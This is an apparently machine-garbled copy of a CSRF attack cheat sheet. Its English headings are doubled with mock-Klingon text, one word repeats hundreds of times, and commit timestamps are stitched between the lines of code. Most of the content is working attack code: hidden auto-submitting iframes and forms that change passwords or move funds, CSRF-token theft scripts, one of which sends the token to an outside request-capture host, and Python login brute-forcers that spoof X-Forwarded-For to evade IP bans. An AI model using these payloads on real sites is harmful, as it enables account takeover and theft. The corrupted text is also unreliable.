To perform a CSRF attack using an iframe, an attacker can create a hidden iframe on a malicious website that contains a form with the target URL as its action. The attacker can then use JavaScript to automatically submit the form when the user visits the malicious website.
When the form is submitted, the browser will send a POST request to the target URL, including any data entered by the user. This can lead to unauthorized actions being performed on the user's behalf, as the browser will include any authentication cookies associated with the target website.
To prevent CSRF attacks, it is important to implement proper CSRF protection mechanisms, such as using anti-CSRF tokens or checking the origin of the request.
#### Klingon
HTML form vItlhutlh browser vItlhutlh POST request yIqaw. vaj HTML form vItlhutlh iframe vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhu
2024-02-05 20:00:40 +00:00
```html
<--! expl.html -->
<body onload="envia()">
<form method="POST"id="formulario" action="http://aplicacion.example.com/cambia_pwd.php">
<input type="text" id="pwd" name="pwd" value="otra nueva">
</form>
<body>
<script>
function envia(){document.getElementById("formulario").submit();}
</script>
<!-- public.html -->
<iframe src="2-1.html" style="position:absolute;top:-5000">
</iframe>
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>
```
2024-02-10 17:52:19 +00:00
### **Qap CSRF Token je 'ej DabwI' je 'ej yIlo'**
```javascript
function submitFormWithTokenJS(token) {
2024-02-10 17:52:19 +00:00
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;
2024-02-10 17:52:19 +00:00
// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
2024-02-10 17:52:19 +00:00
// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
//console.log(xhr.responseText);
}
}
2024-02-10 17:52:19 +00:00
xhr.send("token=" + token + "&otherparama=heyyyy");
}
function getTokenJS() {
2024-02-10 17:52:19 +00:00
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}
var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();
```
2022-05-01 13:25:53 +00:00
### **Steal CSRF Token and send a Post request using an iframe, a form and Ajax**
2024-02-10 17:52:19 +00:00
### **CSRF Token jatlh je, Post request yIqem iframe, form je Ajax lo'wI'**
#### **Iframe Method**
#### **Iframe tuj**
```html
<iframe src="https://www.example.com/transfer?amount=1000&recipient=attacker" style="display:none;"></iframe>
```
```html
<iframe src="https://www.example.com/transfer?amount=1000&recipient=attacker" style="display:none;"></iframe>
```
#### **Form Method**
#### **Form tuj**
```html
<form action="https://www.example.com/transfer" method="POST">
<input type="hidden" name="amount" value="1000">
<input type="hidden" name="recipient" value="attacker">
<input type="submit" value="Submit">
</form>
```
```html
<form action="https://www.example.com/transfer" method="POST">
<input type="hidden" name="amount" value="1000">
<input type="hidden" name="recipient" value="attacker">
<input type="submit" value="Submit">
</form>
```
#### **Ajax Method**
#### **Ajax tuj**
```javascript
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.example.com/transfer", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("amount=1000&recipient=attacker");
```
```javascript
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://www.example.com/transfer", true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("amount=1000&recipient=attacker");
```
2024-02-05 20:00:40 +00:00
```html
<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
<input type="text" name="username" value="AA">
<input type="checkbox" name="status" checked="checked">
<input id="token" type="hidden" name="token" value="" />
</form>
<script type="text/javascript">
function f1(){
2024-02-10 17:52:19 +00:00
x1=document.getElementById("i1");
x1d=(x1.contentWindow||x1.contentDocument);
t=x1d.document.getElementById("token").value;
document.getElementById("token").value=t;
document.getElementById("form1").submit();
}
2024-02-10 17:52:19 +00:00
</script>
<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>
```
2022-05-01 13:25:53 +00:00
### **Steal CSRF Token and sen a POST request using an iframe and a form**
2024-02-10 17:52:19 +00:00
### **QaStaHvIS CSRF Token je 'ej 'ej POST request yIlo' iframe 'ej form**
To perform a Cross-Site Request Forgery (CSRF) attack, you need to steal the CSRF token from the target website and then use it to send a malicious POST request. One way to achieve this is by utilizing an iframe and a form.
To steal the CSRF token, you can create an iframe element in your own website that loads the target website's page containing the CSRF token. By accessing the iframe's content, you can extract the CSRF token using JavaScript.
Once you have obtained the CSRF token, you can construct a form with hidden fields that include the necessary parameters for the POST request. Set the form's action attribute to the target website's vulnerable endpoint and set the method attribute to "POST".
Next, use JavaScript to automatically submit the form when the iframe has finished loading. This will trigger the POST request with the stolen CSRF token, effectively performing the attack.
Here is an example of the HTML code for the iframe and form:
```html
<iframe id="csrfFrame" src="https://target-website.com/page-with-csrf-token"></iframe>
<script>
document.getElementById("csrfFrame").onload = function() {
var csrfToken = document.getElementById("csrfFrame").contentDocument.getElementById("csrfToken").value;
var form = document.createElement("form");
form.setAttribute("action", "https://target-website.com/vulnerable-endpoint");
form.setAttribute("method", "POST");
var hiddenField = document.createElement("input");
hiddenField.setAttribute("type", "hidden");
hiddenField.setAttribute("name", "csrfToken");
hiddenField.setAttribute("value", csrfToken);
form.appendChild(hiddenField);
document.body.appendChild(form);
form.submit();
};
</script>
```
Remember that CSRF attacks can have serious consequences, so always ensure that you have proper authorization and permission before attempting any such attack.
2024-02-05 20:00:40 +00:00
```html
<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>
2024-02-10 17:52:19 +00:00
<script>
function read()
{
2024-02-10 17:52:19 +00:00
var name = 'admin2';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('<form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php" enctype="multipart/form-data">');
document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
document.writeln('</form>');
document.forms[0].submit.click();
}
</script>
```
2024-02-10 17:52:19 +00:00
### **Qap token 'ej legh je 'ej 2 iframes vItlhutlh**
2024-02-05 20:00:40 +00:00
```html
<script>
var token;
function readframe1(){
2024-02-10 17:52:19 +00:00
token = frame1.document.getElementById("profile").token.value;
document.getElementById("bypass").token.value = token
loadframe2();
}
function loadframe2(){
2024-02-10 17:52:19 +00:00
var test = document.getElementbyId("frame2");
test.src = "http://requestb.in/1g6asbg1?token="+token;
}
</script>
2024-02-10 17:52:19 +00:00
<iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
2024-02-10 17:52:19 +00:00
<iframe id="frame2" name="frame2"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name"bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data">
2024-02-10 17:52:19 +00:00
<input type="text" name="username" value="z">
<input type="checkbox" name="status" checked="">
<input id="token" type="hidden" name="token" value="0000" />
<button type="submit">Submit</button>
</form>
```
2022-05-01 13:25:53 +00:00
### **POSTSteal CSRF token with Ajax and send a post with a form**
2024-02-10 17:52:19 +00:00
#### **Ajax-va CSRF token yIqaw'qu' je 'ej post yIlo'**
##### **Ajax-va CSRF token yIqaw'qu' je 'ej post yIlo'**
###### **Ajax-va CSRF token yIqaw'qu' je 'ej post yIlo'**
`<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', '/api/get_csrf_token', true);
xhr.onreadystatechange = function() {
if (xhr.readyState === 4 && xhr.status === 200) {
var csrfToken = xhr.responseText;
var form = document.createElement('form');
form.method = 'POST';
form.action = '/api/change_password';
var input = document.createElement('input');
input.type = 'hidden';
input.name = 'csrf_token';
input.value = csrfToken;
form.appendChild(input);
document.body.appendChild(form);
form.submit();
}
};
xhr.send();
</script>`
2024-02-05 20:00:40 +00:00
```html
<body onload="getData()">
<form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data">
2024-02-10 17:52:19 +00:00
<input type="hidden" name="username" value="root"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="findtoken" name="token" value=""/>
<input type="submit" value="valider"/>
</form>
<script>
var x = new XMLHttpRequest();
function getData() {
2024-02-10 17:52:19 +00:00
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true);
x.send(null);
}
x.onreadystatechange = function() {
2024-02-10 17:52:19 +00:00
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("findtoken").value = token;
document.getElementById("form").submit();
}
}
</script>
```
2022-05-01 13:25:53 +00:00
### CSRF with Socket.IO
2020-08-06 20:38:54 +00:00
2024-02-10 17:52:19 +00:00
#### Description
Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into submitting a malicious request. This attack occurs when a malicious website, email, or other malicious source tricks a user's browser into making a request to a target website where the user is authenticated.
Socket.IO is a JavaScript library that enables real-time, bidirectional communication between web clients and servers. It uses WebSockets as the primary transport mechanism, but can fallback to other techniques such as long polling or server-sent events.
#### Exploiting CSRF with Socket.IO
To exploit CSRF with Socket.IO, the attacker needs to trick the victim into visiting a malicious website that contains a crafted Socket.IO connection. The malicious website can then use the victim's authenticated session to perform actions on the target website.
The following steps outline the process of exploiting CSRF with Socket.IO:
1. The attacker creates a malicious website that includes a Socket.IO connection to the target website.
2. The victim visits the malicious website while being authenticated on the target website.
3. The malicious website uses the Socket.IO connection to send requests to the target website, leveraging the victim's authenticated session.
4. The target website processes the requests as if they were legitimate, since they originate from the victim's browser with the victim's session.
#### Mitigation
To mitigate CSRF attacks with Socket.IO, the following measures can be implemented:
1. Implement CSRF tokens: Include CSRF tokens in Socket.IO requests and validate them on the server-side. This ensures that only legitimate requests are processed.
2. Use SameSite cookies: Set the SameSite attribute of cookies to "Strict" or "Lax" to prevent cross-site requests from being sent with cookies.
3. Implement CORS: Configure Cross-Origin Resource Sharing (CORS) headers on the server-side to restrict which domains can make requests to the Socket.IO endpoint.
4. Educate users: Raise awareness among users about the risks of visiting untrusted websites and clicking on suspicious links.
By implementing these measures, the risk of CSRF attacks with Socket.IO can be significantly reduced.
2024-02-05 20:00:40 +00:00
```html
2020-08-06 20:38:54 +00:00
<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');
const username = 'admin'
socket.on('connect', () => {
2024-02-10 17:52:19 +00:00
console.log('connected!');
socket.emit('join', {
room: username
});
socket.emit('my_room_event', {
data: '!flag',
room: username
})
2020-08-06 20:38:54 +00:00
});
</script>
```
2022-05-01 13:25:53 +00:00
## CSRF Login Brute Force
2020-11-06 18:22:38 +00:00
The code can be used to Brut Force a login form using a CSRF token (It's also using the header X-Forwarded-For to try to bypass a possible IP blacklisting):
2020-11-06 18:22:38 +00:00
2024-02-10 17:52:19 +00:00
```python
import requests
from bs4 import BeautifulSoup
url = "https://example.com/login"
login_data = {"username": "admin", "password": "password"}
# Get the CSRF token
response = requests.get(url)
soup = BeautifulSoup(response.text, "html.parser")
csrf_token = soup.find("input", {"name": "csrf_token"}).get("value")
# Set the CSRF token in the login data
login_data["csrf_token"] = csrf_token
# Send the login request
response = requests.post(url, data=login_data, headers={"X-Forwarded-For": "127.0.0.1"})
# Check if the login was successful
if "Welcome, admin!" in response.text:
print("Login successful")
else:
print("Login failed")
```
The code sends a GET request to the login page to retrieve the CSRF token. It then sets the CSRF token in the login data and sends a POST request to the login page with the login data. The X-Forwarded-For header is used to spoof the source IP address and bypass IP blacklisting. Finally, the code checks if the login was successful by searching for a specific string in the response.
2020-11-06 18:22:38 +00:00
```python
import request
import re
import random
URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"
def init_session():
2024-02-10 17:52:19 +00:00
#Return CSRF + Session (cookie)
r = requests.get(URL)
csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
csrf = csrf.group(1)
session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
return csrf, session_cookie
2020-11-06 18:22:38 +00:00
def login(user, password):
2024-02-10 17:52:19 +00:00
print(f"{user}:{password}")
csrf, cookie = init_session()
cookies = {SESSION_COOKIE_NAME: cookie}
data = {
"tokenCSRF": csrf,
"username": user,
"password": password,
"save": ""
}
headers = {
"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
}
r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
if "Username or password incorrect" in r.text:
return False
else:
print(f"FOUND {user} : {password}")
return True
2020-11-06 18:22:38 +00:00
with open(PASS_LIST, "r") as f:
2024-02-10 17:52:19 +00:00
for line in f:
login(USER, line.strip())
2020-11-06 18:22:38 +00:00
```
2022-05-01 13:25:53 +00:00
## Tools <a href="#tools" id="tools"></a>
* [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe)
2022-09-26 09:52:47 +00:00
* [https://github.com/merttasci/csrf-poc-generator](https://github.com/merttasci/csrf-poc-generator)
2022-05-01 13:25:53 +00:00
## References
* [https://portswigger.net/web-security/csrf](https://portswigger.net/web-security/csrf)
2024-02-05 20:00:40 +00:00
* [https://portswigger.net/web-security/csrf/bypassing-token-validation](https://portswigger.net/web-security/csrf/bypassing-token-validation)
* [https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses](https://portswigger.net/web-security/csrf/bypassing-referer-based-defenses)
* [https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html](https://www.hahwul.com/2019/10/bypass-referer-check-logic-for-csrf.html)
2022-04-28 16:01:33 +00:00
2022-10-27 23:22:18 +00:00
2023-12-04 15:45:05 +00:00
<figure><img src="../../.gitbook/assets/image (1) (3) (1).png" alt=""><figcaption></figcaption></figure>
2023-07-14 15:03:41 +00:00
2023-12-04 15:45:05 +00:00
Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters!
2023-02-27 09:28:45 +00:00
2023-12-04 15:45:05 +00:00
**Hacking Insights**\
Engage with content that delves into the thrill and challenges of hacking
2022-10-27 23:22:18 +00:00
2023-12-04 15:45:05 +00:00
**Real-Time Hack News**\
Keep up-to-date with fast-paced hacking world through real-time news and insights
2023-02-27 09:28:45 +00:00
2023-12-04 15:45:05 +00:00
**Latest Announcements**\
Stay informed with the newest bug bounties launching and crucial platform updates
2023-02-27 09:28:45 +00:00
2023-12-04 15:45:05 +00:00
**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today!
2022-10-27 23:22:18 +00:00
2022-04-28 16:01:33 +00:00
<details>
2023-12-31 01:25:17 +00:00
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2023-12-31 01:25:17 +00:00
Other ways to support HackTricks:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
2022-09-09 11:57:02 +00:00
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2023-12-31 01:25:17 +00:00
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
2024-02-09 07:14:36 +00:00
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2023-12-31 01:25:17 +00:00
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
2022-04-28 16:01:33 +00:00
</details>